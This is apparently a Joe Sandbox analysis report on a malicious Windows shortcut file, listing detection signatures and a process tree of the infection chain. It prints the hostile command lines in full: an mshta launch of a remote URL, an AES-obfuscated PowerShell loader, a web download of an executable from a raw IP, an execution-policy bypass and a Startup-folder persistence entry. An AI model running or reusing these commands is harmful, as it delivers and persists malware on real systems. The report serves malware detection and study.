Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s4PymYGgSh.lnk

Overview

General Information

Sample name:s4PymYGgSh.lnk
renamed because original name is a hash value
Original sample name:f2d11d2f41fe0c5b667ddc0cdde9b149.lnk
Analysis ID:1577872
MD5:f2d11d2f41fe0c5b667ddc0cdde9b149
SHA1:56401fcd09bc96c694ed3c7dd5ad94733cd747ae
SHA256:8c5195f5d2c6f618d5f98a9f32809b5da490cb1c48512d410c1896695fb4d394
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 7684 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7892 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 8128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 2796 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 1180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 1532 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • BFmcYQ.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" MD5: 085AE742872C761A3485E075756E4781)
            • powershell.exe (PID: 7636 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7396 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Guard.exe (PID: 5868 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                • cmd.exe (PID: 4092 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 8036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 7768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 5632 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8128INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1c326a:$b1: ::WriteAllBytes(
  • 0x1c39be:$b1: ::WriteAllBytes(
  • 0x1d9f5:$b3: ::UTF8.GetString(
  • 0x1e5d0:$b3: ::UTF8.GetString(
  • 0x1f11c:$b3: ::UTF8.GetString(
  • 0x1fe1c:$b3: ::UTF8.GetString(
  • 0x20aa5:$b3: ::UTF8.GetString(
  • 0x23c70:$b3: ::UTF8.GetString(
  • 0x247a0:$b3: ::UTF8.GetString(
  • 0x2574b:$b3: ::UTF8.GetString(
  • 0x6dcef:$b3: ::UTF8.GetString(
  • 0x6de37:$b3: ::UTF8.GetString(
  • 0x7486f:$b3: ::UTF8.GetString(
  • 0x9b014:$b3: ::UTF8.GetString(
  • 0x9bb61:$b3: ::UTF8.GetString(
  • 0x9c8b2:$b3: ::UTF8.GetString(
  • 0x166ce2:$b3: ::UTF8.GetString(
  • 0x16fea7:$b3: ::UTF8.GetString(
  • 0x18f468:$b3: ::UTF8.GetString(
  • 0x1a84ed:$b3: ::UTF8.GetString(
  • 0x1a901d:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7396, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 5868, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7396, ProcessName: powershell.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 5868, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 4092, ProcessName: cmd.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7748, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo, ProcessId: 7892, ProcessName: mshta.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7396, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrest
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7768, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7636, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrest
Sigma detected: Execution of Suspicious File Type Extension
